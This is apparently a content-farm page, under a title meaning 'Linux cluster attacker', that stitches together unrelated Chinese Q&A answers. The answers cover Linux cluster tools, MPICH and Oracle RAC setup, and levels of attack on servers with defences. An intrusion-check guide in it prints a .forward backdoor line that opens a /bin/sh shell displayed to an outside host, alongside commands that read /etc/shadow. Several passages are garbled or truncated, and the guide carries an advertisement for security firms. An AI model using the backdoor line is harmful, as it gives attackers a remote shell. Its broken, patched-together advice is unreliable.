linux集群攻擊器
❶ 什麼linux伺服器集群管理面板好用
Linux伺服器集群管理面板好用的有雲幫手,可以批量管理多個雲伺服器,全面支持所有主流雲服務提供商,同時兼容Windows、CentOS、Ubuntu、Debian、OpenSUSE、Fedora等主流雲伺服器操作系統,不限主機數量和站點數量,絕對滿足你的要求了。
❷ 如何防禦針對Linux伺服器的攻擊
引:隨著Linux企業應用的擴展,有大量的網路伺服器使用Linux操作系統。Linux伺服器的安全性能受到越來越多的關注,這里根據Linux伺服器受到攻擊的深度以級別形式列出,並提出不同的解決方案。
隨著Linux企業應用的擴展,有大量的網路伺服器使用Linux操作系統。Linux伺服器的安全性能受到越來越多的關注,這里根據Linux伺服器受到攻擊的深度以級別形式列出,並提出不同的解決方案。
對Linux伺服器攻擊的定義是:攻擊是一種旨在妨礙、損害、削弱、破壞Linux伺服器安全的未授權行為。攻擊的范圍可以從服務拒絕直至完全危害和破壞Linux伺服器。對Linux伺服器攻擊有許多種類,本文從攻擊深度的角度說明,我們把攻擊分為四級。
攻擊級別一:服務拒絕攻擊(DoS)
由於DoS攻擊工具的泛濫,及所針對的協議層的缺陷短時無法改變的事實,DoS也就成為了流傳最廣、最難防範的攻擊方式。
服務拒絕攻擊包括分布式拒絕服務攻擊、反射式分布拒絕服務攻擊、DNS分布拒絕服務攻擊、ftp攻擊等。大多數服務拒絕攻擊導致相對低級的危險,即便是那些可能導致系統重啟的攻擊也僅僅是暫時性的問題。這類攻擊在很大程度上不同於那些想獲取網路控制的攻擊,一般不會對數據安全有影響,但是服務拒絕攻擊會持續很長一段時間,非常難纏。
到目前為止,沒有一個絕對的方法可以制止這類攻擊。但這並不表明我們就應束手就擒,除了強調個人主機加強保護不被利用的重要性外,加強對伺服器的管理是非常重要的一環。一定要安裝驗證軟體和過濾功能,檢驗該報文的源地址的真實地址。另外對於幾種服務拒絕可以採用以下措施:關閉不必要的服務、限制同時打開的Syn半連接數目、縮短Syn半連接的time out 時間、及時更新系統補丁。
攻擊級別二:本地用戶獲取了他們非授權的文件的讀寫許可權
本地用戶是指在本地網路的任一台機器上有口令、因而在某一驅動器上有一個目錄的用戶。本地用戶獲取到了他們非授權的文件的讀寫許可權的問題是否構成危險很大程度上要看被訪問文件的關鍵性。任何本地用戶隨意訪問臨時文件目錄(/tmp)都具有危險性,它能夠潛在地鋪設一條通向下一級別攻擊的路徑。
級別二的主要攻擊方法是:黑客誘騙合法用戶告知其機密信息或執行任務,有時黑客會假裝網路管理人員向用戶發送郵件,要求用戶給他系統升級的密碼。
由本地用戶啟動的攻擊幾乎都是從遠程登錄開始。對於Linux伺服器,最好的辦法是將所有shell賬號放置於一個單獨的機器上,也就是說,只在一台或多台分配有shell訪問的伺服器上接受注冊。這可以使日誌管理、訪問控制管理、釋放協議和其他潛在的安全問題管理更容易些。還應該將存放用戶cgI的系統區分出來。這些機器應該隔離在特定的網路區段,也就是說,根據網路的配置情況,它們應該被路由器或網路交換機包圍。其拓撲結構應該確保硬體地址欺騙也不能超出這個區段。
攻擊級別三:遠程用戶獲得特權文件的讀寫許可權
第三級別的攻擊能做到的不只是核實特定文件是否存在,而且還能讀寫這些文件。造成這種情況的原因是:Linux伺服器配置中出現這樣一些弱點:即遠程用戶無需有效賬號就可以在伺服器上執行有限數量的命令。
密碼攻擊法是第三級別中的主要攻擊法,損壞密碼是最常見的攻擊方法。密碼破解是用以描述在使用或不使用工具的情況下滲透網路、系統或資源以解鎖用密碼保護的資源的一個術語。用戶常常忽略他們的密碼,密碼政策很難得到實施。黑客有多種工具可以擊敗技術和社會所保護的密碼。主要包括:字典攻擊(Dictionary attack)、混合攻擊(Hybrid attack)、蠻力攻擊(Brute force attack)。一旦黑客擁有了用戶的密碼,他就有很多用戶的特權。密碼猜想是指手工進入普通密碼或通過編好程序的正本取得密碼。一些用戶選擇簡單的密碼—如生日、紀念日和配偶名字,卻並不遵循應使用字母、數字混合使用的規則。對黑客來說要猜出一串8個字生日數據不用花多長時間。
防範第三級別的攻擊的最好的防衛方法便是嚴格控制進入特權,即使用有效的密碼。
◆ 主要包括密碼應當遵循字母、數字、大小寫(因為Linux對大小寫是有區分)混合使用的規則。
◆ 使用象「#」或「%」或「"countbak"一詞,它後面添加「##」
攻擊級別四:遠程用戶獲得根許可權
第四攻擊級別是指那些決不應該發生的事發生了,這是致命的攻擊。表示攻擊者擁有Linux伺服器的根、超級用戶或管理員許可權,可以讀、寫並執行所有文件。換句話說,攻擊者具有對Linux伺服器的全部控制權,可以在任何時刻都能夠完全關閉甚至毀滅此網路。
攻擊級別四主要攻擊形式是TCP/IP連續偷竊,被動通道聽取和信息包攔截。TCP/IP連續偷竊,被動通道聽取和信息包攔截,是為進入網路收集重要信息的方法,不像拒絕服務攻擊,這些方法有更多類似偷竊的性質,比較隱蔽不易被發現。一次成功的TCP/IP攻擊能讓黑客阻攔兩個團體之間的交易,提供中間人襲擊的良好機會,然後黑客會在不被受害者注意的情況下控制一方或雙方的交易。通過被動竊聽,黑客會操縱和登記信息,把文件送達,也會從目標系統上所有可通過的通道找到可通過的致命要害。黑客會尋找聯機和密碼的結合點,認出申請合法的通道。信息包攔截是指在目標系統約束一個活躍的聽者程序以攔截和更改所有的或特別的信息的地址。信息可被改送到非法系統閱讀,然後不加改變地送回給黑客。
TCP/IP連續偷竊實際就是網路嗅探,注意如果您確信有人接了嗅探器到自己的網路上,可以去找一些進行驗證的工具。這種工具稱為時域反射計量器(Time Domain Reflectometer,TDR)。TDR對電磁波的傳播和變化進行測量。將一個TDR連接到網路上,能夠檢測到未授權的獲取網路數據的設備。不過很多中小公司沒有這種價格昂貴的工具。
對於防範嗅探器的攻擊最好的方法是:
1、安全的拓撲結構。嗅探器只能在當前網路段上進行數據捕獲。這就意味著,將網路分段工作進行得越細,嗅探器能夠收集的信息就越少。
2、會話加密。不用特別地擔心數據被嗅探,而是要想辦法使得嗅探器不認識嗅探到的數據。這種方法的優點是明顯的:即使攻擊者嗅探到了數據,這些數據對他也是沒有用的。
特別提示:應對攻擊的反擊措施
對於超過第二級別的攻擊您就要特別注意了。因為它們可以不斷的提升攻擊級別,以滲透Linux伺服器。此時,我們可以採取的反擊措施有:
◆ 首先備份重要的企業關鍵數據。
◆ 改變系統中所有口令,通知用戶找系統管理員得到新口令。
◆ 隔離該網路網段使攻擊行為僅出現在一個小范圍內。
◆ 允許行為繼續進行。如有可能,不要急於把攻擊者趕出系統,為下一步作準備。
◆ 記錄所有行為,收集證據。這些證據包括:系統登錄文件、應用登錄文件、AAA(Authentication、Authorization、 Accounting,認證、授權、計費)登錄文件,RADIUS(Remote Authentication Dial-In User Service) 登錄,網路單元登錄(Network Element Logs)、防火牆登錄、HIDS(Host-base IDS,基於主機的入侵檢測系統) 事件、NIDS(網路入侵檢測系統)事件、磁碟驅動器、隱含文件等。收集證據時要注意:在移動或拆卸任何設備之前都要拍照;在調查中要遵循兩人法則,在信息收集中要至少有兩個人,以防止篡改信息;應記錄所採取的所有步驟以及對配置設置的任何改變,要把這些記錄保存在安全的地方。檢查系統所有目錄的存取許可,檢測Permslist是否被修改過。
◆ 進行各種嘗試(使用網路的不同部分)以識別出攻擊源。
◆ 為了使用法律武器打擊犯罪行為,必須保留證據,而形成證據需要時間。為了做到這一點,必須忍受攻擊的沖擊(雖然可以制定一些安全措施來確保攻擊不損害網路)。對此情形,我們不但要採取一些法律手段,而且還要至少請一家有權威的安全公司協助阻止這種犯罪。這類操作的最重要特點就是取得犯罪的證據、並查找犯罪者的地址,提供所擁有的日誌。對於所搜集到的證據,應進行有效地保存。在開始時製作兩份,一個用於評估證據,另一個用於法律驗證。
◆ 找到系統漏洞後設法堵住漏洞,並進行自我攻擊測試。
網路安全已經不僅僅是技術問題,而是一個社會問題。企業應當提高對網路安全重視,如果一味地只依靠技術工具,那就會越來越被動;只有發揮社會和法律方面打擊網路犯罪,才能更加有效。我國對於打擊網路犯罪已經有了明確的司法解釋,遺憾的是大多數企業只重視技術環節的作用而忽略法律、社會因素,這也是本文的寫作目的。
❸ 什麼是Linux集群
集群通信系統是一種計算機系統,
它通過一組鬆散集成的計算機軟體和/或硬體連接起來高度緊密地協作完成計算工作。簡單地說,集群(cluster)就是一組計算機,它們作為一個整體向用戶提供一組網路資源。這些單個的計算機系統就是集群的節點(node)。一個理想的集群,用戶是不會意識到集群系統底層的節點的。在他們看來,集群是一個系統,而非多個計算機系統。並且集群系統的管理員可以隨意增加和刪改集群系統的節點。
集群已不是一個全新的概念,早在七十年代計算機廠商和研究機構就對集群系統進行了研究和開發。這些系統不為大家熟知,是因為它主要用於科學工程計算。直到Linux集群的出現,集群的概念才得以廣泛傳播。集群系統主要分為高可用(High
Availability)集群,簡稱HA集群,和高性能計算(High Perfermance Computing)集群,簡稱HPC集群。
在Linux出現前,集群系統採用的操作系統主要有VMS、UNIX和WindowsNT。到九十年代末期,linux操作系統不斷走向成熟,它的健壯性不斷增強,並且提供了GNU軟體和標准化的PVM、MPI消息傳遞機制,最重要的是Linux在普通PC機上提供了對高性能網路的支持,這樣就大大推動了基於Linux的集群系統的普及和發展。
❹ 如何入侵linux伺服器
華盛頓大學的安全研究員Andre' DiMino注意到了多個IP地址試圖利用一個已修復PHP漏洞劫持Linux伺服器,他很好奇攻擊者如何成功控制一台Linux伺服器, 因此設立了一個蜜罐,運行舊版本的PHP,讓攻擊者劫持,進行觀察。DiMino發現,攻擊者確實非常狡猾,發出了包含多個指令的HTTP POST請求,下載一個偽裝成PDF文件的 Perl 腳本,執行之後刪除。
為了確保成功,攻擊者使用 curl、fetch、lwp-get請求重復上述步驟。Perl 腳本編程休眠一段時間,猜測可能是避開管理員的耳目。最終被感染的機器連上一個中繼聊天頻道,下載執行另一個腳本。攻擊者在伺服器上安裝了多個應用,包括 比特幣和素數幣挖礦程序,DDoS工具,掃描其它存在已知漏洞的機器的工具。隨著Linux伺服器的流行,它和Windows PC一樣成為攻擊者眼中極具吸引力的目標。
❺ 如何對區域網內的多台Linux進行集群化管理
它非常適合用來快速配置一個集群中的所有運行相同服務和具備相同配置的計算機節點。現在有大量的開源管理工具,都可以實現這樣的管理,比如dsh、SUSE Manager等。下面是用ClusterSSH管理多台Linux伺服器的具體過程。
如果你是一名Linux系統管理員,那你每天一定會和許許多多的機器打交道,因為你要定期監測和維護這些機器,如一批Web伺服器,如果你要同時在多台機器上敲入相同的命令,你可能會通過SSH登錄,然後逐台敲入,如果使用ClusterSSH,可以為你節省不少類似的工作時間。
ClusterSSH是用Tk/Perl包裝XTerm和SSH後形成的新工具,就其本身而言,它可以運行在任何兼容POSIX的操作系統上,我曾經在Linux,Solaris和Mac OS X上運行過它,它需要Perl庫Tk(在Debian或Ubuntu上就是perl-tk)和X11::Protocol(在Debian或Ubuntu上就是libx11-protocol-perl),此外,xterm和OpenSSH是必不可少的。
安裝在Debian或Ubuntu上安裝ClusterSSH是相當簡單的,只需要敲入sudo apt-get install clusterssh就可以安裝好,至於依賴包你也不必擔心,一切都會為你裝好的,它也提供了適合Fedora的rpm包,在FreeBSD上可通過port系統安裝,還為Mac OS X准備了MacPort版本,因此你可以在你的蘋果電腦上安裝ClusterSSH,當然,如果你是極客,也可以下載源代碼自己編譯。
配置可以通過ClusterSSH的全局配置文件/etc/clusters,或用戶home目錄下的。csshrc文件來配置它,我喜歡用戶級的配置方式,這樣同一個系統中的不同用戶可以根據自己的喜好進行配置,ClusterSSH定義了一個「cluster」機器組,你可以通過一個界面來控制這個組中的所有機器,在配置文件的頂端「clusters」部分,你可以詳盡地列出你的集群,然後用獨立的段落來描述每個集群。
例如,假設我有兩個集群,每個集群由兩台機器組成,「Cluster1」由「Test1」和「Test2」兩台機器組成,「Cluster2」由「Test3」和「Test4」兩台機器組成,~.csshrc(或/etc/clusters)配置文件的內容看起來應該是:
clusters = cluster1 cluster2
cluster1 = test1 test2
cluster2 = test3 test4你也可以創建中間集群(包含其它集群的集群),如果你想創建一個名叫「all」的集群包含所有的機器,有兩種實現手段,首先,你可以創建一個包含所有機器的集群,如:
clusters = cluster1 cluster2 all
cluster1 = test1 test2
cluster2 = test3 test4
all = test1 test2 test3 test4但我更喜歡的方法是使用一個包含其它集群的中間集群:
clusters = cluster1 cluster2 allcluster1 = test1 test2
❻ 如何最快搭建LINUX伺服器集群
1.2.並行技術
這是一個非常簡單的建造四節點的小集群系統的例子,它是構建在Linux操作系統上,通過MPICH軟體包實現的,希望這個小例子能讓大家對集群系統的構建有一個最基本的了解。
2.使用MPICH構建一個四節點的集群系統
這是一個非常簡單的建造四節點的小集群系統的例子,它是構建在Linux操作系統上,通過MPICH軟體包實現的,希望這個小例子能讓大家對集群系統的構建有一個最基本的了解。
2.1 所需設備
1).4台採用Pentium II處理器的PC機,每台配
置64M內存,2GB以上的硬碟,和EIDE介面的光碟驅動器。
2).5塊100M快速乙太網卡,如SMC 9332 EtherPower 10/100(其中四塊卡用於連接集群中的結點,另外一塊用於將集群中的其中的一個節點與其它網路連接。)
3).5根足夠連接集群系統中每個節點的,使用5類非屏蔽雙絞線製作的RJ45纜線
4).1個快速乙太網(100BASE-Tx)的集線器或交換機
5).1張Linux安裝盤
2.2 構建說明
對計算機硬體不熟的人,實施以下這些構建步驟會感到吃力。如果是這樣,請找一些有經驗的專業人士尋求幫助。
1. 准備好要使用的採用Pentium II處理器的PC機。確信所有的PC機都還沒有接上電源,打開PC機的機箱,在准備與網路上的其它設備連接的PC機上安裝上兩塊快速乙太網卡,在其它的 PC機上安裝上一塊快速乙太網卡。當然別忘了要加上附加的內存。確定完成後蓋上機箱,接上電源。
2. 使用4根RJ45線纜將四台PC機連到快速乙太網的集線器或交換機上。使用剩下的1根RJ45線將額外的乙太網卡(用於與其它網路相連的那塊,這樣機構就可以用上集群)連接到機構的區域網上(假定你的機構區域網也是快速乙太網),然後打開電源。
3. 使用LINUX安裝盤在每一台PC機上安裝。請確信在LINUX系統中安裝了C編譯器和C的LIB庫。當你配置TCP/IP時,建議你為四台PC分別指定為192.168.1.1、192.168.1.2、192.168.1.3、192.168.1.4。第一台PC為你的伺服器節點(擁有兩塊網卡的那台)。在這個伺服器節點上的那塊與機構區域網相連的網卡,你應該為其指定一個與機構區域網吻合的IP地址。
4.當所有PC都裝好Linux系統後,編輯每台機器的/etc/hosts文件,讓其包含以下幾行:
192.168.1.1 node1 server
192.168.1.2 node2
192.168.1.3 node3
192.168.1.4 node4
編輯每台機器的/etc/hosts.equiv文件,使其包含以下幾行:
node1
node2
node3
node4
$p#
以下的這些配置是為了讓其能使用MPICH』s p4策略去執行分布式的並行處理應用。
1. 在伺服器節點
,建一個/mirror目錄,並將其配置成為NFS伺服器,並在/etc/exports文件中增加一行:
/mirror node1(rw) node2(rw) node3(rw) node4(rw)
2. 在其他節點上,也建一個/mirror目錄,關在/etc/fstab文件中增加一行:
server:/mirror /mirror nfs rw,bg,soft 0 0
3. /mirror這個目錄從伺服器上輸出,裝載在各個客戶端,以便在各個節點間進行軟體任務的分發。
4. 在伺服器節點上,安裝MPICH。MPICH的文檔可在
5.任何一個集群用戶(你必須在每一個節點新建一個相同的用戶),必須在/mirror目錄下建一個屬於它的子目錄,如 /mirror/username,用來存放MPI程序和共享數據文件。這種情況,用戶僅僅需要在伺服器節點上編譯MPI程序,然後將編譯後的程序拷貝到在/mirror目錄下屬於它的的子目錄中,然後從他在/mirror目錄下屬於它的的子目錄下使用p4 MPI策略運行MPI程序。
2.3 MPICH安裝指南
1.如果你有gunzip,就d下載mpich.tar.gz,要不然就下載mpich.tar.Z。你可以到http://www.mcs.anl.gov/mpi/mpich/downloa下載,也可以使用匿名FTP到ftp.mcs.anl.gov的pub/mpi目錄拿。(如果你覺得這個東西太大,你可以到pub/mpi/mpisplit中取分隔成塊的幾個小包,然後用cat命令將它們合並)
2.解壓:gunzip ;c mpich.tar.gz tar xovf-(或zcat mpich.tar.Ztar xovf-)
3.進入mpich目錄
4.執行:./configure為MPICH選擇一套適合你的實際軟硬體環境的參數組,如果你對這些默認選擇的參數不滿意,可以自己進行配置(具體參見MPICH的配置文檔)。最好選擇一個指定的目錄來安裝和配置MPICH,例如:
./configure -prefix=/usr/local/mpich-1.2.0
5.執行:make >&make.log 這會花一段較長的時間,不同的硬體環境花的時間也就不同,可能從10分鍾到1個小時,甚至更多。
6.(可選)在工作站網路,或是一台單獨的工作站,編輯mpich/util/machines/machines.xxx(xxx是MPICH對你機器體系結構取的名稱,你能很容易的認出來)以反映你工作站的當地主機名。你完全可以跳過這一步。在集群中,這一步不需要。
7.(可選)編譯、運行一個簡單的測試程序:
cd examples/basic
make cpi
ln ;s ../../bin/mpirun mpirun
./mpirun ;np 4 cpi
此時,你就在你的系統上運行了一個MPI程序。
8.(可選)構建MPICH其餘的環境,為ch_p4策略使
用安全的服務會使得任何啟動速度加快,你可以執行以下命令構建:
make serv_p4
(serv_p4是一個較新的P4安全服務的版本,它包含在MPICH 1.2.0版中),nupshot程序是upshot程序的一個更快版本,但他需要tk 3.6版的源代碼。如果你有這個包,你就用以下命令可以構建它:
make nupshot
9.(可選)如果你想將MPICH安裝到一個公用的地方讓其它人使用它,你可以執行:
make install 或 bin/mpiinstall
你可以使用-prefix選項指定MPICH安裝目錄。安裝後將生成include、lib、bin、sbin、www和man目錄以及一個小小的示例目錄,
到此你可以通告所有的用戶如何編譯、執行一個MPI程序。
❼ Linux伺服器是否被攻擊怎麼判斷
1、檢查系統密碼文件
首先從明顯的入手,查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期。
檢查一下passwd文件中有哪些特權用戶,系統中uid為0的用戶都會被顯示出來。
1
awk –F:』$3==0{print$1}』/etc/passwd
順便再檢查一下系統里有沒有空口令帳戶:
1
awk –F: 『length($2)==0{print$1}』/etc/shadow
2、查看一下進程,看看有沒有奇怪的進程
重點查看進程:ps –aef | grep inetd
inetd是UNIX系統的守護進程,正常的inetd的pid都比較靠前,如果你看到輸出了一個類似inetd –s /tmp/.xxx之類的進程,著重看inetd –s後面的內容。在正常情況下,LINUX系統中的inetd服務後面是沒有-s參數的,當然也沒有用inetd去啟動某個文件;而solaris系統中也僅僅是inetd –s,同樣沒有用inetd去啟動某個特定的文件;如果你使用ps命令看到inetd啟動了某個文件,而你自己又沒有用inetd啟動這個文件,那就說明已經有人入侵了你的系統,並且以root許可權起了一個簡單的後門。
輸入ps –aef 查看輸出信息,尤其注意有沒有以./xxx開頭的進程。一旦發現異樣的進程,經檢查為入侵者留下的後門程序,立即運行kill –9 pid 開殺死該進程,然後再運行ps –aef查看該進程是否被殺死;一旦此類進程出現殺死以後又重新啟動的現象,則證明系統被人放置了自動啟動程序的腳本。這個時候要進行仔細查找:find / -name 程序名 –print,假設系統真的被入侵者放置了後門,根據找到的程序所在的目錄,會找到很多有趣的東東J
UNIX下隱藏進程有的時候通過替換ps文件來做,檢測這種方法涉及到檢查文件完整性,稍後我們再討論這種方法。
接下來根據找到入侵者在伺服器上的文件目錄,一步一步進行追蹤。
3、檢查系統守護進程
檢查/etc/inetd.conf文件,輸入:cat /etc/inetd.conf | grep –v 「^#」,輸出的信息就是你這台機器所開啟的遠程服務。
一般入侵者可以通過直接替換in.xxx程序來創建一個後門,比如用/bin/sh 替換掉in.telnetd,然後重新啟動inetd服務,那麼telnet到伺服器上的所有用戶將不用輸入用戶名和密碼而直接獲得一個rootshell。
4、檢查網路連接和監聽埠
輸入netstat -an,列出本機所有的連接和監聽的埠,查看有沒有非法連接。
輸入netstat –rn,查看本機的路由、網關設置是否正確。
輸入 ifconfig –a,查看網卡設置。
5、檢查系統日誌
命令last | more查看在正常情況下登錄到本機的所有用戶的歷史記錄。但last命令依賴於syslog進程,這已經成為入侵者攻擊的重要目標。入侵者通常會停止系統的syslog,查看系統syslog進程的情況,判斷syslog上次啟動的時間是否正常,因為syslog是以root身份執行的,如果發現syslog被非法動過,那說明有重大的入侵事件。
在linux下輸入ls –al /var/log
在solaris下輸入 ls –al /var/adm
檢查wtmp utmp,包括messgae等文件的完整性和修改時間是否正常,這也是手工擦除入侵痕跡的一種方法。
6、檢查系統中的core文件
通過發送畸形請求來攻擊伺服器的某一服務來入侵系統是一種常規的入侵方法,典型的RPC攻擊就是通過這種方式。這種方式有一定的成功率,也就是說它並不能100%保證成功入侵系統,而且通常會在伺服器相應目錄下產生core文件,全局查找系統中的core文件,輸入find / -name core –exec ls –l {} ; 依據core所在的目錄、查詢core文件來判斷是否有入侵行為。
7、.rhosts和.forward
這是兩種比較著名的後門文件,如果想檢查你的系統是否被入侵者安裝了後門,不妨全局查找這兩個文件:
find / -name 「.rhosts」 –print
find / -name 「.forward」 –print
在某用戶的$HOME下,.rhosts文件中僅包含兩個+號是非常危險的,如果你的系統上開了513埠(rlogin埠,和telnet作用相同),那麼任意是誰都可以用這個用戶登錄到你的系統上而不需要任何驗證。
看到這里如果想要深入的做安全加固服務以及安全部署
就必須找專業做伺服器的安全公司來處理了國內也就Sine安全和綠盟比較專業提供。
Unix下在.forward文件里放入命令是重新獲得訪問的常用方法在某一 用戶$HOME下的.forward可能設置如下:
username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh"
這種方法的變形包括改變系統的mail的別名文件(通常位於/etc/aliases). 注意這只是一種簡單的變換. 更為高級的能夠從.forward中運行簡單腳本實現在標准輸入執行任意命令(小部分預處理後).利用smrsh可以有效的制止這種後門(雖然如果允許可以自運行的elm's filter或procmail類程序, 很有可能還有問題。在Solaris系統下,如果你運行如下命令:
ln -s /var/mail/luser ~/.forward
然後設置vacation有效,那麼/var/mail/luser就會被拷貝到~/.forward,同時會附加"|/usr/bin/vacation me",舊的symlink被移到~/.forward..BACKUP中。
直接刪除掉這兩個文件也可以。
8、檢查系統文件完整性
檢查文件的完整性有多種方法,通常我們通過輸入ls –l 文件名來查詢和比較文件,這種方法雖然簡單,但還是有一定的實用性。但是如果ls文件都已經被替換了就比較麻煩。在LINUX下可以用rpm –V `rpm –qf 文件名` 來查詢,國家查詢的結果是否正常來判斷文件是否完整。在LINUX下使用rpm來檢查文件的完整性的方法也很多,這里不一一贅述,可以man rpm來獲得更多的格式。
UNIX系統中,/bin/login是被入侵者經常替換作為後門的文件,接下來談一下login後門 :
UNIX里,Login程序通常用來對telnet來的用戶進行口令驗證。入侵者獲取login的源代碼並修改,使它在比較輸入口令與存儲口令時先檢查後門口令。如果用戶敲入後門口令,它將忽視管理員設置的口令讓你長驅直入:這將允許入侵者進入任何賬號,甚至是root目錄。由於後門口令是在用戶真實登錄並被日誌記錄到utmp和wtmP前產生的一個訪問,所以入侵者可以登錄獲取shell卻不會暴露該賬號。管理員注意到這種後門後,使用」strings」命令搜索login程序以尋找文本信息。許多情況下後門口令會原形畢露。入侵者又會開始加密或者更改隱藏口令,使strings命令失效。所以許多管理員利用MD5校驗和檢測這種後門。UNIX系統中有md5sum命令,輸入md5sum 文件名檢查該文件的md5簽名。它的使用格式如下:md5sum –b 使用二進制方式閱讀文件;md5sum –c 逆向檢查MD5簽名;md5sum –t 使用文本方式閱讀文件。
在前面提到過守護進程,對於守護進程配置文件inetd.conf中沒有被注釋掉的行要進行仔細比較,舉個簡單的例子,如果你開放了telnet服務,守護進程配置文件中就會有一句:telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd
可以看到它所使用的文件是 /usr/sbin/in.telnetd,檢查該文件的完整性,入侵者往往通過替換守護進程中允許的服務文件來為自己創建一個後門。
LINUX系統中的/etc/crontab也是經常被入侵者利用的一個文件,檢查該文件的完整性,可以直接cat /etc/crontab,仔細閱讀該文件有沒有被入侵者利用來做其他的事情。
不替換login等文件而直接使用進程來啟動後門的方法有一個缺陷,即系統一旦重新啟動,這個進程就被殺死了,所以得讓這個後門在系統啟動的時候也啟動起來。通常通過檢查/etc/rc.d下的文件來查看系統啟動的時候是不是帶有後門程序;這個方法怎麼有點象查windows下的trojan?
說到這里,另外提一下,如果在某一目錄下發現有屬性為這樣的文件:-rwsr-xr-x 1 root root xxx .sh,這個表明任何用戶進來以後運行這個文件都可以獲得一個rootshell,這就是setuid文件。運行 find –perm 4000 –print對此類文件進行全局查找,然後刪除這樣的文件。
9、檢查內核級後門
如果你的系統被人安裝了這種後門,通常都是比較討厭的,我常常就在想,遇到這種情況還是重新安裝系統算了J,言歸正傳,首先,檢查系統載入的模塊,在LINUX系統下使用lsmod命令,在solaris系統下使用modinfo命令來查看。這里需要說明的是,一般默認安裝的LINUX載入的模塊都比較少,通常就是網卡的驅動;而solaris下就很多,沒別的辦法,只有一條一條地去分析。對內核進行加固後,應禁止插入或刪除模塊,從而保護系統的安全,否則入侵者將有可能再次對系統調用進行替換。我們可以通過替換create_mole()和delete_mole()來達到上述目的。另外,對這個內核進行加固模塊時應盡早進行,以防系統調用已經被入侵者替換。如果系統被載入了後門模塊,但是在模塊列表/proc/mole里又看不到它們,有可能是使用了hack工具來移除載入的模塊,大名鼎鼎的knark工具包就有移除載入模塊的工具。出現這種情況,需要仔細查找/proc目錄,根據查找到的文件和經驗來判斷被隱藏和偽裝的進程。Knark後門模塊就在/proc/knark目錄,當然可能這個目錄是隱藏的。
❽ 請問linux集群、oracle集群是什麼技術
一、linux集群
Linux集群系統包括集群節點和集群管理器兩部分。集群節點有時簡稱為節點、伺服器或伺服器節點,是提供處理資源的系統,它進行集群的實際工作。一般來講,它必須進行配置才能成為集群的一部分,也必須運行集群的應用軟體。應用軟體可以是專用於集群的軟體,也可以是設計用於分布式系統的標准軟體。Linux集群管理器則是將節點捆綁在一起,以構成單一系統外觀的邏輯結構,它用於將任務分解到所有的節點。
集群因多種不同的原因而有著不同的類型,建立Linux集群的最直接原因是共享CPU資源,在多個機器之間平衡負載,獲得更多的系統可靠性,或在主機失敗時提供後備系統(切換)。
通過對相關軟體的分析,實現集群負載的功能是通過流量管理實現的,具體有以下幾種實現方法:直接路由(Direct Forwarding)、網路地址轉換(NAT)和隧道技術(Tunneling)。
直接路由(Direct Forwarding)是當參與集群的計算機和作為控制管理的計算機在同一個網段時可以使用此法。控制管理的計算機接收到請求包時,直接送到參與集群的節點。它的優點是返回給客戶的流量不經過控制主機,速度快、開銷少。
可能大家比較熟悉網路地址轉換(NAT)這種方法。地址轉換器有能被外界訪問到的合法IP地址,它修改來自專有網路的流出包的地址,外界看起來包是來自地址轉換器本身。當外界包送到轉換器時,它能判斷出應該將包送到內部網的哪個節點。它的優點是節省IP地址,能對內部進行偽裝;缺點是效率低,因為返回給請求方的流量要經過轉換器。
隧道技術(Tunneling)這種方式是Linux集群的節點不在同一個網段時採用的轉發機制,是將IP包封裝在其它網路流量中。從安全形度考慮,應該使用隧道技術中的VPN,也可使用租用專線。
Linux集群所能提供的服務是基於TCP/IP的Web服務、Mail服務、News服務、DNS服務和Proxy伺服器等。
二、oracle集群
Oracle集群,最早稱作OPS(Oracle Parallel Server)出現在Oracle 7版本中,從Oracle 9i開始正式改稱為Oracle RAC,RAC即Real Application Clusters的簡寫,譯為「真正應用集群」;RAC是Oracle新版資料庫中採用的一項新技術,也是Oracle資料庫支持網格計算環境的核心技術。
在Oracle RAC環境下,Oracle集成提供了集群軟體和存儲管理軟體,為用戶降低了應用成本。當應用規模需要擴充時,用戶可以按需擴展系統,以保證系統的性能。
資料庫雙機可以有兩種不同的方式:雙機熱備份、雙機集群。
雙機熱備份方式的集群完全通過操作系統的cluster軟體來實現,在同一個時刻,只有一台機器對資料庫作操作,當這台機器發生故障以後,由操作系統cluster將所有資源切換到兩外一個節點,防止單節點資料庫故障。
雙機集群方式(RAC),在10g以後,通過ORACLE自身提供的CRS來實現集群的功能。在同一個時刻,所有的機器都對資料庫作操作,當某台機器發生故障後,其他機器接管該機器的工作。這種方式不但能夠防止單節點資料庫故障,還能夠實現負載均衡。因為兩個機器對同一個資料庫操作,因此資料庫文件一般無法使用傳統的文件系統方式存儲。
❾ 如何搭建Linux 攻擊的靶機,用來進行網路安全演示
建議:1. 首先需要確定你的網路或者是伺服器打算是搭建在Windows系統中還是Linux或者Unix系統中;
2. 以Windows系統為例,通常使用Windows 2003 Enterprise Edition或者Windows 2008 Enterprise Edition。
❿ linux伺服器感覺被攻擊了,求高手解決
1、127.0.0.1是本機ip
2、可以用tcpmp -nn -i eth0檢查相應網卡發包
3、檢查httpd日誌
4、檢查/var/log/secure
5、netstat -ntlp檢查埠及對應進程,關閉沒用的埠
6、cat /etc/passwd 關閉沒有用的賬戶
7、ps -ef檢查所有進程,普通用戶如果弱密碼也可以被執行蠕蟲腳本,不斷發包用盡帶寬。